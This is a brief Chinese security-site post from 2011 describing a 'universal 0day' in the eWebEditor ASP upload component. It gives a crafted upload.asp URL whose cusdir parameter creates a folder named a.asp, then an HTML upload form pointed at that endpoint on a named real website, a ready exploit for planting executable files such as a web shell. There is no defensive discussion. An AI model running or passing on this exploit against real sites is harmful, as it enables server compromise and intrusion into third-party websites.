ewebeditor通杀鸡肋0day漏洞
来源:好再见网 2011-02-20 14:37:08
先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
访问这个地址可以建立个A.ASP的文件夹……
再用这个html代码上传。
<form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
本文标签:
上一篇 : DedeCmsV5.6 本地包含又一利用方式
下一篇 : KesionCMS(科讯)上传漏洞与防范方法